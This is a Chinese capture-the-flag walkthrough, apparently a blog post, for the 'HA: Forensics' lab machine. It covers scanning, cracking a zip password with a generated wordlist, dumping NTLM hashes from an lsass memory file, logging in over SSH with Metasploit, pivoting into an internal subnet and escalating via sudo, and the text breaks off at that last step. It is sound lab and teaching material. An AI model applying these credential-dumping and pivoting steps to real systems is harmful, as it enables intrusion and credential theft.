靶机说明:
哈:法医学是实验室的中级水平,它能让你在网络法医调查中亲身体验。这个实验室完全致力于网络法医调查的方法和工具,并且有各种技术可以找到的证据。由于这是一个捕获旗帜的过程,因此需要注意的是,这不是一个根本性的挑战,而是找到所有旗帜的主要动机。
旗数:4
目标:找到所有4个标志(获取根不是目标)
一、信息收集
1.主机发现
arp-scan -l
发现靶机 ip:192.168.1.201
2.端口扫描
nmap -A -p- 192.168.1.201
发现靶机开启了 80 端口,Apache 服务;22 端口,ssh 服务
二、漏洞挖掘
1.访问靶机 web 服务
发现一些关于指纹的图片,点击右上角 get flag,发现作者整活,未发现其他有用信息
2.使用 dirb 进行目录扫描
dirb http://192.168.1.201
发现 /images/ 目录,见名知意应该是存放图片的目录
访问该路径发现若干图片,其中有名为 DNA 和 fingerprint(指纹)的可疑图片,经过测试发现 DNA 没有有用信息
3.使用 exiftool 提取数据
apt-get install exiftool #kali并未自带此工具,使用该命令更改
exiftool fingerprint.jpg
发现 flag1
Flag:1 {bc02d4ffbeeab9f57c5e03de1098ff31}
4.使用 dirb 扫描 txt 文件
dirb http://192.168.1.201 -X .txt
发现在网站根目录下有个 tips.txt 文件
访问该文件(这里我换了网络环境,靶机ip为192.168.2.192)
发现一个路径一个 zip 压缩文件
1)访问 http://192.168.2.192/flag.zip 进行下载 zip 文件,解压时发现需要密码
2)访问 http://192.168.2.192/igolder 发现该路径下有 clue.txt 文件,打开发现 PGP 加密
-----BEGIN PGP PRIVATE KEY BLOCK-----
Version: BCPG C# v1.6.1.0
lQOsBF9sr70BCACvH5Vs2Lp9nyVIbVk4yraUmxDBxPJNitlU/IqcR2d+UDEORbDl
UClLXSqapjBFuu24p86SIcv/1VktRh79lnL5j4uKSAEuI/t6SJW4hlfovVBndUvT
X61w6TRJlLq5AsLOS38PWpIgL1ECIqliwNfCjjlvQd8xm/C9BV1lqM71JYtW34ST
XsKzxomVqGtWvrzs/tFege20z12JtqgPmqGApXzNjI4y7iH0vvVS8nCF58nwyjoH
wbx6EXk002hDe0/W7tsCGhp3gU5wzkUy4kfBfVrLp0/23kA/k4iJvlMPMAeQoJPx
AymXmXEKlp+igBrBicBw68SZgLAQhg8ZO2ybABEBAAH/AwMC/MDF76NvTu1gM8Y7
xjKap2L3OY8xeOoAeMQUueabuTP2rl7jB6YfsEcQj4xDjz0SBXIQxP0PziHpXTk3
v5FlH5nhSWZI6OgN0HF6rdjByKT4CNlkt7IVIPEQc7IidQP5K1/YhbghysyYHyBH
3TRAEwJszcjj6TsAOM1mpLXlPweM1sC3ms8xoFVSipPcHviNcQq58zLpGcWvmmuc
ZfqrRBqfpU/wZEmEvcDW1FOCvq/Bqo1psPOXYfI+ul7C0MLObmzi/u2p7EJLwf2E
tGBJ++wLdProHJHovp0WlQSHFamOWmM5p9SAq7lMegvIn3NHe0ZQS2agjBzNiMW5
LK/dZ0i1lX1SSRNNOlLC+Tf/v6bS8gAD+WSGsYEITPcRP2OpCiCBoa4d7GsK7nyF
RHIngmJrp5g1agayG92ahUFRLqQ7KGa+hu3N8/pM+x/dNH1Uw/jhKHsacpgBBCPf
Zs/NZlcMbCI0TD6CFKe2QCEnOW6iLlOEgV2ptEPJLkinaFZ8BEf5HYHUhW1CqwTZ
otvsmzkijYDvaV77zylVqb9gMJelVNWLZG3fcw+eCGF1wBBxno99xcxEgJpzdOeH
TnU3yQ1JllZb/0jQ7vBq22hrOTYo9iRBe/XOnUj1+J8QVynYLcgvEx8I8/tXnfNM
/bQkwbEohnTzklDWWKrqBXlXOTpBKZL4bk+k0U5wMpOQOkCgiHTMmklmAV/+0S/G
5EDrNNdCDCIdtXtAHJjIUtVivNNyQIgVuImYbhbXcSWziX0IT0QkRGSz8a+/MKl3
0yItTNXi/KpnOt+xfvjavzPscXyKyt7+82feOsl4f/jDFZW6P4NifjWGeP+9Q8FA
MPPZ/xDjhIgBvsqLpGDEuYp7VTVxWWIUtzao7P4WzLQAiQEcBBABAgAGBQJfbK+9
AAoJEF0YY4bPiiBW83YH/jU75ZqnBG3yJGOYa7qapXIPc/Dg6jc1FuivWlphZs8C
PSog9kqEqlY3k5OY03YBMIRgWMI2UyCgiSPcgwF8bGXm8hPQgL0QN5cFX7uubH9S
ofeM+SyRRSpuXtcWgljHe6e/ABR533bwLdk6YyHf4YyCxCDxWZRdI/FyoRYrh7q4
CTfgVJoiem1P9sViva28IBJ+H1ctyioWVEkKz1/PW9NBYy9mTbmVlwdWW1IzXRiS
OcXu0tW1rawJ/z5SwCwjKZxvSm2Hfk9eguEojbfPIoXauNRH00u4tEHO6YjD54ZC
DxpZfSHSCsOWEfOAA5EO+uDGSY4+WB6ihKmCV+i68Jc=
=KoPg
-----END PGP PRIVATE KEY BLOCK-----
-----BEGIN PGP MESSAGE-----
Version: BCPG C# v1.6.1.0
hQEMA10YY4bPiiBWAQf8DaEoVUWpzj5+3WMZcOhjfXo6Hk+MKD5TLWy5XndaEXRZ
3+aUQuECr88LG83BzmAS1MITHf7xifx4aiqgeM6bGILlvseP9W2Fmv9E5KOVLUYI
T8V3jINwmNg7FinwuYlT2ld2yU1qMwiEZ8GPTK4U90WSZh+/dYnKTVKxjdEZXlj9
FF42BygUxjJgEDFQi0HhUb7AX+tYQIQV0p5DZcTETZweyM9OBcwuhwzspjKp3Rz9
zFcnnCEZ4+JbdXTcXPD9cTBHJhWk01lclg+XR4v572HilznzWFutqcWrMuhBO0UZ
q0v1MOG03o8MN2VysMgbk8gEdOs+GE8fPBtsKqS5tsmhcwZR3QA/BctqAT+IhYtI
s7j0pd+mTG+zvQu5B41isicBb0yLA80YVlfWjjUmZAAF4oowPKJWY9CQIap39Ked
cbLU2+CI3JJf7JZvcZK4KGeuYgpRXU8Jvu3BHSEu1zCHGgieYRW254OJYZcJYFx6
v+6OPq+UNCBbhAFRjJpkOigA+GgH5lGf0vRYM/gz5vA4MDRrEojFs9DIwATbflqN
QOs=
=Y9OD
-----END PGP MESSAGE-----
5.PGP解密
访问 https://www.igolder.com/PGP/decryption/ 进行在线解密
解密后发现提示:
如果法医忘记了他的密码,这个提示可以帮助他,其中密码是6个字符长,开始3个字符是单词“for”,结束3个字符是数字
6.破解密码
1)使用 crunch 或脚本生成密码本
crunch 6 6 -t for%%% -o dict.txt
2)使用 fcrackzip 利用密码本破解密码
fcrackzip -u -D -p dict.txt flag.zip
3)使用密码解密
unzip flag.zip
for007
解压后得到 flag.pdf、lsass.DMP 文件
打开 flag.pdf 得到 flag2
Flag:2 {4a3232c59ecda21ac71bebe3b329bf36}
7.分析 lsass.DMP 文件
1)使用 pypykatz 检查内存转储文件
pypykatz lsa minidump ./lsass.DMP
发现两个明文用户名和 NTML 加密的密码,发现其密码相同
在网站 https://www.cmd5.com/ 对其进行解密
得到密码 Password@1
三、使用 msfconsole 进行后渗透
1.kali 打开 msfconsole ,search ssh/ssh_login
msfconsole
msf> search ssh/ssh_login
2.利用该模块
use 0
show options
set rhosts 192.168.1.111 #靶机IP地址,这里我右换了个网络QAQ
set username jasoos
set password Password@1
run
3.查看当前所有·会话信息
sessions -l
4.升级会话
sessions -u 1
5.进入会话并查看网络连接
sessions 2
ifconfig
发现有多个网络连接其中有一个内部 ip 172.17.0.1,我们不能从外部直接进行访问考虑使用靶机作为跳板
6.横向渗透
1)使用 exit 退出当前 meterpreter shell
再次升级 shell
exit
sessions -u 1
2)添加路由
use post/multi/manage/autoroute
set session 3
run
3)探测主机
use post/multi/gather/ping_sweep
set session 3
set rhosts 172.17.0.0/24
run
发现 127.17.0.1、127.17.0.2
4)端口扫描
use auxiliary/scanner/portscan/tcp
set rhosts 172.17.0.2
set ports 1-1000
run
发现 21 端口(ftp)开放
5)测试 ftp 是否可匿名登陆
use auxiliary/scanner/ftp/anonymous
set rhosts 172.17.0.2
run
发现可以匿名登陆
6)进入 ftp,查看文件
sessions 3
shell
python -c "import pty;pty.spawn('/bin/bash')"
ftp 172.17.0.2
anonymous
ls
cd pub
ls
发现有 saboot.001 文件,使用 get 获取
get saboot.001
7)使用 python 简单服务器进行传输文件
python -m SimpleHTTPServer 8888
8)kali 获取文件
wget http://192.168.1.111:8888/saboot.001
9)分析文件
发现该文件是个磁盘镜像
四、磁盘镜像取证
1.打开 kali 自带工具 autopsy
2.火狐访问 http://localhost:9999/autopsy
1)新建任务
2)填写信息
重新访问该工具服务
加载磁盘镜像后发现了 flag3.txt、 creads.txt:
Flag:3 {8442460f48338fe60a9497b8e0e9022f}
amVlbmFsaWlzYWdvb2RnaXJs
发现 creads.txt 中字符疑似 base64 加密,进行解密
得到明文 jeenaliisagoodgirl 疑似用户密码
五、提权
1.回到靶机shell,查看所有用户
发现 forensic 用户,尝试使用 ssh 进行连接
ssh forensic@192.168.1.111
yes
jeenaliisagoodgirl
2.查看可 sudo 执行的命令
sudo -l
发现可以执行所有命令
3.直接提权
2万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
